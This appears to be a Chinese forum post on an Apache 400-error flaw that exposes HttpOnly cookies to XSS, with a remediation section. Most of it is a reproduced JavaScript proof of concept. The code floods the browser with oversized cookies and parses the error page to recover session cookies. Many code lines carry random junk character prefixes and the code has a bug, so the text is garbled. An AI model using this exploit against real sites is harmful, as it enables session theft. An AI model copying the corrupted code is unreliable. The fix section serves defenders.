Apache HttpOnly Cookie XSS跨站漏洞

admin

很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题，一般都采用给cookie加上httponly的属性，来禁止直接使用js得到用户的cookie，从而降低xss的危害，而这个问题刚好可以用来绕过cookie的这个httponly的属性。
* k2 s( @+ B2 ?0 A
用chrome打开一个站点，F12打开开发者工具，找到console输入如下代码并回车:


! n1 r) D& x4 [// http://www.exploit-db.com/exploits/18442/
. R5 i; i/ E5 `& K% c! v+ kfunction setCookies (good) {
' l$ E. @: @0 O; V" {// Construct string for cookie value
var str = "";
for (var i=0; i< 819; i++) {
( o' g: \" l/ g4 I0 b( \" jstr += "x";
* p, d) o- L: f( a0 H0 H. ~0 \}
0 ~2 Y, c' x  |! c! ]// Set cookies
for (i = 0; i < 10; i++) {
// Expire evil cookie
if (good) {
4 [' A5 X: {* r# J( K& O# l4 W5 ~var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
0 d+ a7 o  c# C/ i1 s}
// Set evil cookie
+ ?$ T7 q9 M* a" ]/ Welse {
$ g9 |  d) Y! K" D2 Lvar cookie = "xss"+i+"="+str+";path=/";
}
document.cookie = cookie;
  z6 V5 t4 E! I; F0 R5 O! R}
}
* a# u5 z& Y7 V  C" Jfunction makeRequest() {
setCookies();
function parseCookies () {
* O5 b# M" j2 z$ X; L2 H: @8 Qvar cookie_dict = {};
: v2 H8 Z9 M' G2 w! U& \// Only react on 400 status
if (xhr.readyState === 4 && xhr.status === 400) {
9 ^6 o- t0 F3 m4 I/ r// Replace newlines and match <pre> content
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
# z4 K2 |8 B6 r  _% l9 B$ Bif (content.length) {
. I8 D' u% N1 \. R* Y0 o: s1 x// Remove Cookie: prefix
content = content[1].replace("Cookie: ", "");
7 p$ v9 c8 k% Y7 Gvar cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
0 o! I- r* g1 v// Add cookies to object
for (var i=0; i<cookies.length; i++) {
* f3 u5 S* J0 {1 Kvar s_c = cookies.split('=',2);
cookie_dict[s_c[0]] = s_c[1];
}
}
( C& ^8 L0 l6 O: D8 B) y, G// Unset malicious cookies
setCookies(true);
alert(JSON.stringify(cookie_dict));
}
}
// Make XHR request
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = parseCookies;
8 r6 t9 W. H2 ]5 G$ M4 Bxhr.open("GET", "/", true);
2 k1 |# H3 A; ~. S( bxhr.send(null);
}
makeRequest();

你就能看见华丽丽的400错误包含着cookie信息。
& z( V5 z* A# h) e! ?7 H; f
下载地址：https://gist.github.com/pilate/1955a1c28324d4724b7b/download#

修复方案：

/ L9 f, b4 Z% ?) t. Y) h" w5 V: v" ]Apache官方提供4种错误处理方式（http://httpd.apache.org/docs/2.0/mod/core.html#errordocument），如下
* [$ H; z# @! a3 b, ?  T+ k: e
9 L( M8 U4 B' y- a4 z* K5 S; @In the event of a problem or error, Apachecan be configured to do one of four things,

1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
3 x* V7 M3 ~" |6 [- c2. output acustomized message输出一段信息
3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面
% r4 [7 r% D6 ^0 R& q4. redirect to an external URL to handle theproblem/error转向一个外部URL
) h2 k$ i/ |- R4 b' G
3 X; |- L8 v; y5 m经测试，对于400错误只有方法2有效，返回包不会再包含cookie内容
# p: Z  d- x' J$ y% E# c! q5 E
3 a/ i7 C3 p1 [( w- N* lApache配置：

ErrorDocument400 " security test"

1 P: F- l3 f& N. F$ N+ W; c当然，升级apache到最新也可：）。
8 O* F% \' U8 C7 `! p
参考：http://httpd.apache.org/security/vulnerabilities_22.html